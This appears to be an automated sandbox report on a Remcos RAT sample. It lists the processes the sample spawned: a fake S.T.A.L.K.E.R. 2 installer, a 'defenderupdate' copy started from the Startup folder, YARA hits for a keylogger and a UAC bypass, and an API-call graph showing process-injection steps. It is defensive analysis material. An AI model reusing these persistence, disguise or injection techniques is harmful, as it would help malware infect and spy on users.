                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:22:47:10
                                                                                              Start date:24/11/2024
                                                                                              Path:C:\Users\user\Desktop\eBHn6qHPLz.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\eBHn6qHPLz.exe"
                                                                                              Imagebase:0x570000
                                                                                              File size:3'410'432 bytes
                                                                                              MD5 hash:12F35A41245C2DBB16D0574D9DCC59C9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1871058602.00000000046AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1871058602.00000000046AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1871058602.00000000046AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1871058602.00000000046AE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1859614323.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1918216843.00000000078C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:22:47:28
                                                                                              Start date:24/11/2024
                                                                                              Path:C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe"
                                                                                              Imagebase:0x6f0000
                                                                                              File size:2'849'736 bytes
                                                                                              MD5 hash:719E5D10DAFEDD2EFC8FD7A446AB7C2F
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:Borland Delphi
                                                                                              Antivirus matches:
                                                                                              • Detection: 0%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              Target ID:3
                                                                                              Start time:22:47:28
                                                                                              Start date:24/11/2024
                                                                                              Path:C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp" /SL5="$1000C6,192512,0,C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe"
                                                                                              Imagebase:0xe00000
                                                                                              File size:1'335'808 bytes
                                                                                              MD5 hash:FF5EBF66CDDD9913B729DE78EEB638C8
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:Borland Delphi
                                                                                              Antivirus matches:
                                                                                              • Detection: 4%, ReversingLabs
                                                                                              • Detection: 0%, Virustotal, Browse
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              Target ID:4
                                                                                              Start time:22:47:28
                                                                                              Start date:24/11/2024
                                                                                              Path:C:\Users\user\Desktop\eBHn6qHPLz.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\eBHn6qHPLz.exe"
                                                                                              Imagebase:0x8d0000
                                                                                              File size:3'410'432 bytes
                                                                                              MD5 hash:12F35A41245C2DBB16D0574D9DCC59C9
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.3538658538.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.3538658538.00000000011D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              Target ID:7
                                                                                              Start time:22:47:42
                                                                                              Start date:24/11/2024
                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\defenderupdate.vbs"
                                                                                              Imagebase:0x7ff79f1c0000
                                                                                              File size:170'496 bytes
                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:8
                                                                                              Start time:22:47:42
                                                                                              Start date:24/11/2024
                                                                                              Path:C:\Users\user\AppData\Roaming\defenderupdate.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Roaming\defenderupdate.exe"
                                                                                              Imagebase:0xb90000
                                                                                              File size:3'410'432 bytes
                                                                                              MD5 hash:12F35A41245C2DBB16D0574D9DCC59C9
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.2168900167.00000000032F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2183906073.0000000004643000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2183906073.0000000004643000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2183906073.0000000004643000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2183906073.0000000004643000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 61%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:9
                                                                                              Start time:22:47:59
                                                                                              Start date:24/11/2024
                                                                                              Path:C:\Users\user\AppData\Roaming\defenderupdate.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Roaming\defenderupdate.exe"
                                                                                              Imagebase:0x520000
                                                                                              File size:3'410'432 bytes
                                                                                              MD5 hash:12F35A41245C2DBB16D0574D9DCC59C9
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2166640000.0000000000D67000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:11.8%
                                                                                                Dynamic/Decrypted Code Coverage:98%
                                                                                                Signature Coverage:4.8%
                                                                                                Total number of Nodes:294
                                                                                                Total number of Limit Nodes:13
                                                                                                execution_graph 55606 6622e63 55607 6622e82 55606->55607 55610 662d7f0 55607->55610 55612 662d817 55610->55612 55614 662dc40 55612->55614 55615 662dc88 VirtualProtect 55614->55615 55617 6622ea9 55615->55617 55849 662a441 55850 662a460 55849->55850 55852 662d7f0 VirtualProtect 55850->55852 55851 662a48b 55852->55851 55939 4c03e28 55940 4c03e7d CopyFileA 55939->55940 55942 4c03f7f 55940->55942 55853 4b96310 55854 4b96325 55853->55854 55858 4b96341 55854->55858 55863 4b96350 55854->55863 55855 4b9633b 55860 4b9637a 55858->55860 55859 4b965c0 55859->55855 55860->55859 55868 4b99a38 55860->55868 55872 4b99a30 55860->55872 55865 4b9637a 55863->55865 55864 4b965c0 55864->55855 55865->55864 55866 4b99a38 SleepEx 55865->55866 55867 4b99a30 SleepEx 55865->55867 55866->55865 55867->55865 55869 4b99a78 SleepEx 55868->55869 55871 4b99ab6 55869->55871 55871->55860 55873 4b99a78 SleepEx 55872->55873 55875 4b99ab6 55873->55875 55875->55860 55943 e9d104 55944 e9d11c 55943->55944 55945 e9d177 55944->55945 55947 662e248 55944->55947 55948 662e270 55947->55948 55951 662ead8 55948->55951 55949 662e297 55952 662eb05 55951->55952 55953 662d7f0 VirtualProtect 55952->55953 55955 662ec9b 55952->55955 55954 662ec8c 55953->55954 55954->55949 55955->55949 55618 eecd60 DuplicateHandle 55619 eecdf6 55618->55619 55876 ee46c0 55877 ee46d0 55876->55877 55880 ee4250 55877->55880 55879 ee46d5 55881 ee425b 55880->55881 55884 ee4260 55881->55884 55883 ee476d 55883->55879 55885 ee426b 55884->55885 55888 ee43f8 55885->55888 55887 ee4842 55887->55883 55889 ee4403 55888->55889 55892 ee4428 55889->55892 55891 ee4954 55891->55887 55893 ee4433 55892->55893 55898 ee7470 55893->55898 55895 ee7979 55895->55891 55896 ee7750 55896->55895 55902 eec441 55896->55902 55899 ee747b 55898->55899 55900 ee8f3a 55899->55900 55907 ee8f89 55899->55907 55900->55896 55904 eec44d 55902->55904 55903 eec495 55903->55895 55904->55903 55912 eec5f2 55904->55912 55916 eec600 55904->55916 55908 ee8f1c 55907->55908 55909 ee8f92 55907->55909 55908->55900 55910 ee8fe6 KiUserCallbackDispatcher 55909->55910 55911 ee9010 55909->55911 55910->55911 55911->55900 55913 eec600 55912->55913 55915 eec647 55913->55915 55920 eeae60 55913->55920 55915->55903 55918 eec60d 55916->55918 55917 eec647 55917->55903 55918->55917 55919 eeae60 KiUserCallbackDispatcher 55918->55919 55919->55917 55921 eeae6b 55920->55921 55923 eed358 55921->55923 55924 eec764 55921->55924 55923->55923 55925 eec76f 55924->55925 55926 ee4428 KiUserCallbackDispatcher 55925->55926 55927 eed3c7 55926->55927 55927->55923 55620 4c04a50 55621 4c04a65 55620->55621 55627 4c04a80 55621->55627 55632 4c05005 55621->55632 55637 4c04bb5 55621->55637 55642 4c04a90 55621->55642 55622 4c04a7b 55629 4c04aba 55627->55629 55628 4c04bf2 55628->55622 55629->55628 55647 4c05fc0 55629->55647 55651 4c05fb1 55629->55651 55634 4c04ae7 55632->55634 55633 4c04bf2 55633->55622 55634->55633 55635 4c05fc0 10 API calls 55634->55635 55636 4c05fb1 10 API calls 55634->55636 55635->55634 55636->55634 55639 4c04ae7 55637->55639 55638 4c04bf2 55638->55622 55639->55638 55640 4c05fc0 10 API calls 55639->55640 55641 4c05fb1 10 API calls 55639->55641 55640->55639 55641->55639 55644 4c04aba 55642->55644 55643 4c04bf2 55643->55622 55644->55643 55645 4c05fc0 10 API calls 55644->55645 55646 4c05fb1 10 API calls 55644->55646 55645->55644 55646->55644 55648 4c05fd5 55647->55648 55655 4c061d4 55648->55655 55652 4c05fd5 55651->55652 55654 4c061d4 10 API calls 55652->55654 55653 4c05ff7 55653->55629 55654->55653 55656 4c061ec 55655->55656 55662 4c06850 55656->55662 55676 4c0680b 55656->55676 55690 4c06818 55656->55690 55704 4c06860 55656->55704 55657 4c05ff7 55657->55629 55663 4c06856 55662->55663 55718 4c06f91 55663->55718 55723 4c06abf 55663->55723 55728 4c06a5e 55663->55728 55733 4c0786e 55663->55733 55738 4c070bb 55663->55738 55743 4c0703a 55663->55743 55748 4c06b46 55663->55748 55753 4c071e5 55663->55753 55758 4c07975 55663->55758 55763 4c06b04 55663->55763 55768 4c06b61 55663->55768 55664 4c06897 55664->55657 55677 4c06816 55676->55677 55677->55657 55679 4c06f91 2 API calls 55677->55679 55680 4c06b61 2 API calls 55677->55680 55681 4c06b04 2 API calls 55677->55681 55682 4c07975 2 API calls 55677->55682 55683 4c071e5 2 API calls 55677->55683 55684 4c06b46 2 API calls 55677->55684 55685 4c0703a 2 API calls 55677->55685 55686 4c070bb 2 API calls 55677->55686 55687 4c0786e 2 API calls 55677->55687 55688 4c06a5e 2 API calls 55677->55688 55689 4c06abf 2 API calls 55677->55689 55678 4c06897 55678->55657 55679->55678 55680->55678 55681->55678 55682->55678 55683->55678 55684->55678 55685->55678 55686->55678 55687->55678 55688->55678 55689->55678 55691 4c0682a 55690->55691 55691->55657 55693 4c06f91 2 API calls 55691->55693 55694 4c06b61 2 API calls 55691->55694 55695 4c06b04 2 API calls 55691->55695 55696 4c07975 2 API calls 55691->55696 55697 4c071e5 2 API calls 55691->55697 55698 4c06b46 2 API calls 55691->55698 55699 4c0703a 2 API calls 55691->55699 55700 4c070bb 2 API calls 55691->55700 55701 4c0786e 2 API calls 55691->55701 55702 4c06a5e 2 API calls 55691->55702 55703 4c06abf 2 API calls 55691->55703 55692 4c06897 55692->55657 55693->55692 55694->55692 55695->55692 55696->55692 55697->55692 55698->55692 55699->55692 55700->55692 55701->55692 55702->55692 55703->55692 55705 4c06875 55704->55705 55707 4c06f91 2 API calls 55705->55707 55708 4c06b61 2 API calls 55705->55708 55709 4c06b04 2 API calls 55705->55709 55710 4c07975 2 API calls 55705->55710 55711 4c071e5 2 API calls 55705->55711 55712 4c06b46 2 API calls 55705->55712 55713 4c0703a 2 API calls 55705->55713 55714 4c070bb 2 API calls 55705->55714 55715 4c0786e 2 API calls 55705->55715 55716 4c06a5e 2 API calls 55705->55716 55717 4c06abf 2 API calls 55705->55717 55706 4c06897 55706->55657 55707->55706 55708->55706 55709->55706 55710->55706 55711->55706 55712->55706 55713->55706 55714->55706 55715->55706 55716->55706 55717->55706 55719 4c06fa0 55718->55719 55773 4c0f3a0 55719->55773 55777 4c0f39b 55719->55777 55720 4c07011 55720->55664 55724 4c06acc 55723->55724 55781 4c0fa20 55724->55781 55785 4c0fa18 55724->55785 55725 4c0709c 55729 4c06a6d 55728->55729 55789 4c0eb00 55729->55789 55793 4c0eafb 55729->55793 55730 4c069ec 55734 4c0787d 55733->55734 55736 4c0eb00 Wow64SetThreadContext 55734->55736 55737 4c0eafb Wow64SetThreadContext 55734->55737 55735 4c069ec 55736->55735 55737->55735 55739 4c070ca 55738->55739 55741 4c0f3a0 WriteProcessMemory 55739->55741 55742 4c0f39b WriteProcessMemory 55739->55742 55740 4c069ec 55741->55740 55742->55740 55744 4c07044 55743->55744 55746 4c0fa20 NtResumeThread 55744->55746 55747 4c0fa18 NtResumeThread 55744->55747 55745 4c0709c 55746->55745 55747->55745 55749 4c069ec 55748->55749 55750 4c0720b 55748->55750 55797 4c0f100 55750->55797 55801 4c0f0f8 55750->55801 55754 4c071ef 55753->55754 55756 4c0f100 VirtualAllocEx 55754->55756 55757 4c0f0f8 VirtualAllocEx 55754->55757 55755 4c069ec 55756->55755 55757->55755 55759 4c0798d 55758->55759 55805 4c08180 55759->55805 55810 4c08190 55759->55810 55760 4c079a5 55765 4c06b0e 55763->55765 55764 4c069ec 55765->55764 55766 4c0f100 VirtualAllocEx 55765->55766 55767 4c0f0f8 VirtualAllocEx 55765->55767 55766->55764 55767->55764 55769 4c06b70 55768->55769 55771 4c0f3a0 WriteProcessMemory 55769->55771 55772 4c0f39b WriteProcessMemory 55769->55772 55770 4c06c14 55770->55664 55771->55770 55772->55770 55774 4c0f3e8 WriteProcessMemory 55773->55774 55776 4c0f43f 55774->55776 55776->55720 55778 4c0f3a0 WriteProcessMemory 55777->55778 55780 4c0f43f 55778->55780 55780->55720 55782 4c0fa68 NtResumeThread 55781->55782 55784 4c0fa9d 55782->55784 55784->55725 55786 4c0fa20 NtResumeThread 55785->55786 55788 4c0fa9d 55786->55788 55788->55725 55790 4c0eb45 Wow64SetThreadContext 55789->55790 55792 4c0eb8d 55790->55792 55792->55730 55794 4c0eb45 Wow64SetThreadContext 55793->55794 55796 4c0eb8d 55794->55796 55796->55730 55798 4c0f140 VirtualAllocEx 55797->55798 55800 4c0f17d 55798->55800 55800->55749 55802 4c0f100 VirtualAllocEx 55801->55802 55804 4c0f17d 55802->55804 55804->55749 55806 4c081a7 55805->55806 55807 4c081c9 55806->55807 55815 4c08270 55806->55815 55820 4c082ec 55806->55820 55807->55760 55811 4c081a7 55810->55811 55812 4c081c9 55811->55812 55813 4c08270 2 API calls 55811->55813 55814 4c082ec 2 API calls 55811->55814 55812->55760 55813->55812 55814->55812 55816 4c0827f 55815->55816 55825 4c0e330 55816->55825 55829 4c0e324 55816->55829 55821 4c08314 55820->55821 55823 4c0e330 CreateProcessA 55821->55823 55824 4c0e324 CreateProcessA 55821->55824 55822 4c086fd 55823->55822 55824->55822 55826 4c0e394 CreateProcessA 55825->55826 55828 4c0e51c 55826->55828 55830 4c086fd 55829->55830 55831 4c0e32b CreateProcessA 55829->55831 55833 4c0e51c 55831->55833 55928 6623850 55930 662d7f0 VirtualProtect 55928->55930 55929 66201db 55930->55929 55834 6628df4 55837 662eed0 55834->55837 55838 662eee5 55837->55838 55841 662ef20 55838->55841 55842 662ef47 55841->55842 55845 662f028 55842->55845 55846 662f068 VirtualAlloc 55845->55846 55848 66201db 55846->55848 55956 ee4698 55957 ee46a6 55956->55957 55960 ee3e70 55957->55960 55959 ee46af 55961 ee3e7b 55960->55961 55962 ee4250 KiUserCallbackDispatcher 55961->55962 55963 ee46d5 55962->55963 55963->55959 55964 eecb18 55965 eecb5e GetCurrentProcess 55964->55965 55967 eecba9 55965->55967 55968 eecbb0 GetCurrentThread 55965->55968 55967->55968 55969 eecbed GetCurrentProcess 55968->55969 55970 eecbe6 55968->55970 55971 eecc23 55969->55971 55970->55969 55972 eecc4b GetCurrentThreadId 55971->55972 55973 eecc7c 55972->55973 55931 4c0d997 55932 4c0d921 NtProtectVirtualMemory 55931->55932 55934 4c0d99b 55931->55934 55935 4c0d968 55932->55935 55974 eea390 55978 eea488 55974->55978 55983 eea477 55974->55983 55975 eea39f 55979 eea4bc 55978->55979 55980 eea499 55978->55980 55979->55975 55980->55979 55981 eea6c0 GetModuleHandleW 55980->55981 55982 eea6ed 55981->55982 55982->55975 55984 eea4bc 55983->55984 55985 eea499 55983->55985 55984->55975 55985->55984 55986 eea6c0 GetModuleHandleW 55985->55986 55987 eea6ed 55986->55987 55987->55975
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-312445597
                                                                                                • Opcode ID: 79a09fc9c7aa244470d5a6462812de61f2d3753e2e5df05f7e173d4a7b63af21
                                                                                                • Instruction ID: 58e09507a58dcd43e0d5e749e469131b4cbaa14ebfa414fa89155720f8c0429b
                                                                                                • Opcode Fuzzy Hash: 79a09fc9c7aa244470d5a6462812de61f2d3753e2e5df05f7e173d4a7b63af21
                                                                                                • Instruction Fuzzy Hash: 95B2F534A00228CFDB54DFA8C994BADB7B6FB48704F148599E509AB3A4DB71EC85CF50
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882981617.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4ba0000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-2546334966
                                                                                                • Opcode ID: 7d28b939d380eb4b8973383bd4942f78d299dc5571976e0f21c39241830aa045
                                                                                                • Instruction ID: 2176f1aa51566894ef07b7315376aefec3a2adb4f69db63107211c122e50cc2d
                                                                                                • Opcode Fuzzy Hash: 7d28b939d380eb4b8973383bd4942f78d299dc5571976e0f21c39241830aa045
                                                                                                • Instruction Fuzzy Hash: 89220834A04218CFDB64DFA8C994BA9B7B2FF48304F1481D9E509AB3A5DB31AD95CF50

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1655 4c0a368-4c0a389 1656 4c0a390-4c0a41a 1655->1656 1657 4c0a38b 1655->1657 1751 4c0a420 call 4c0aed8 1656->1751 1752 4c0a420 call 4c0aec9 1656->1752 1657->1656 1663 4c0a426-4c0a473 1666 4c0a482 1663->1666 1667 4c0a475-4c0a480 1663->1667 1668 4c0a48c-4c0a5a7 1666->1668 1667->1668 1679 4c0a5b9-4c0a5e4 1668->1679 1680 4c0a5a9-4c0a5af 1668->1680 1681 4c0ada7-4c0adc3 1679->1681 1680->1679 1682 4c0a5e9-4c0a74c call 4c08e30 1681->1682 1683 4c0adc9-4c0ade4 1681->1683 1694 4c0a75e-4c0a8ea call 4c06708 call 4c03a40 1682->1694 1695 4c0a74e-4c0a754 1682->1695 1707 4c0a8ec-4c0a8f0 1694->1707 1708 4c0a94f-4c0a959 1694->1708 1695->1694 1709 4c0a8f2-4c0a8f3 1707->1709 1710 4c0a8f8-4c0a94a 1707->1710 1711 4c0ab80-4c0ab9f 1708->1711 1712 4c0ac25-4c0ac90 1709->1712 1710->1712 1713 4c0aba5-4c0abcf 1711->1713 1714 4c0a95e-4c0aaa4 call 4c08e30 1711->1714 1731 4c0aca2-4c0aced 1712->1731 1732 4c0ac92-4c0ac98 1712->1732 1720 4c0abd1-4c0ac1f 1713->1720 1721 4c0ac22-4c0ac23 1713->1721 1743 4c0ab79-4c0ab7a 1714->1743 1744 4c0aaaa-4c0ab76 call 4c08e30 1714->1744 1720->1721 1721->1712 1734 4c0acf3-4c0ad8b 1731->1734 1735 4c0ad8c-4c0ada4 1731->1735 1732->1731 1734->1735 1735->1681 1743->1711 1744->1743 1751->1663 1752->1663
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1883176093.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4c00000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: fcq$8
                                                                                                • API String ID: 0-89531850
                                                                                                • Opcode ID: 3e8cf5940e848740f8a78869fa7a2d31f2d85c0c00639da83d466e2c984bba17
                                                                                                • Instruction ID: 5ec08d89436ed7a4645482bd1b2235c70ea61c6d75b40625c8a425f113b8e556
                                                                                                • Opcode Fuzzy Hash: 3e8cf5940e848740f8a78869fa7a2d31f2d85c0c00639da83d466e2c984bba17
                                                                                                • Instruction Fuzzy Hash: F852D675E002298FDB64DF69C990AD9B7B2FB89304F1485EAD50DA7354DB30AE81CF90

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2093 4b99d2f-4b99d30 2094 4b99d32-4b99d89 2093->2094 2095 4b99cb5-4b99ce3 2093->2095 2101 4b99d8c-4b99d92 2094->2101 2099 4b99cea-4b99cf6 2095->2099 2100 4b99ce5 2095->2100 2105 4b99cfb-4b99cff 2099->2105 2100->2099 2103 4b99d9b-4b99d9c 2101->2103 2104 4b99d94 2101->2104 2107 4b99e4e-4b99e57 2103->2107 2104->2103 2106 4b99e5c-4b99f45 call 4b96c00 2104->2106 2104->2107 2108 4b99e1e-4b99e22 2104->2108 2109 4b99da1-4b99e0e call 4b943c0 call 4b95180 2104->2109 2110 4b99e13-4b99e14 2104->2110 2111 4b99e16-4b99e1d 2104->2111 2128 4b99f4d-4b99f55 2106->2128 2107->2101 2108->2107 2112 4b99e24-4b99e3b 2108->2112 2109->2101 2110->2111 2112->2101 2114 4b99e41-4b99e49 2112->2114 2114->2101 2130 4b9a0d9-4b9a0f4 2128->2130 2131 4b9a139-4b9a13d 2128->2131 2132 4b9a169-4b9a16d 2128->2132 2133 4b99f68-4b99f80 2128->2133 2134 4b99fd8-4b99ff3 2128->2134 2135 4b9a19c-4b9a1f7 2128->2135 2136 4b9a1fc-4b9a200 2128->2136 2137 4b9a05c-4b9a077 2128->2137 2138 4b9a213-4b9a22e 2128->2138 2139 4b99f82-4b99f86 2128->2139 2140 4b99f62-4b99f63 2128->2140 2141 4b99f96-4b99fc9 call 4b99950 2128->2141 2144 4b9a0ff-4b9a134 2130->2144 2131->2144 2145 4b9a13f-4b9a156 2131->2145 2146 4b99ffe-4b9a057 2132->2146 2147 4b9a173-4b9a189 2132->2147 2133->2128 2134->2146 2135->2128 2142 4b9a082-4b9a0c8 2136->2142 2143 4b9a206-4b9a20d 2136->2143 2137->2142 2148 4b9a239-4b9a23b 2138->2148 2139->2138 2150 4b99f8c-4b99f94 2139->2150 2140->2148 2141->2128 2162 4b99fcb-4b99fd3 2141->2162 2142->2128 2173 4b9a0ce-4b9a0d4 2142->2173 2143->2138 2144->2128 2145->2128 2153 4b9a15c-4b9a164 2145->2153 2146->2128 2147->2128 2154 4b9a18f-4b9a197 2147->2154 2148->2111 2150->2128 2153->2128 2154->2128 2162->2128 2173->2128
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1882901319.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4b90000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Y4$\DJU
                                                                                                • API String ID: 0-2261510793
                                                                                                • Opcode ID: 3a40e11d000a2e59120cca3f948b47deefe2a2c1fe63c1ca7cd4a02d12d09a4c
                                                                                                • Instruction ID: a88b2965e056f9f927f5ded7ce429c7c5d9b9b957a476d2069ec77066b0d6db7
                                                                                                • Opcode Fuzzy Hash: 3a40e11d000a2e59120cca3f948b47deefe2a2c1fe63c1ca7cd4a02d12d09a4c
                                                                                                • Instruction Fuzzy Hash: 3FE106B4A05218CFDB54DFA4D988BADBBF2FB49304F1090AAD409AB395DB306D85CF01
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1883176093.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_4c00000_eBHn6qHPLz.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: fcq$h
                                                                                                • API String ID: 0-1849521214
                                                                                                • Opcode ID: 73e4f40c707e217536932b32421b9adb982ee18353dbb92caab46c8c22e9eea9
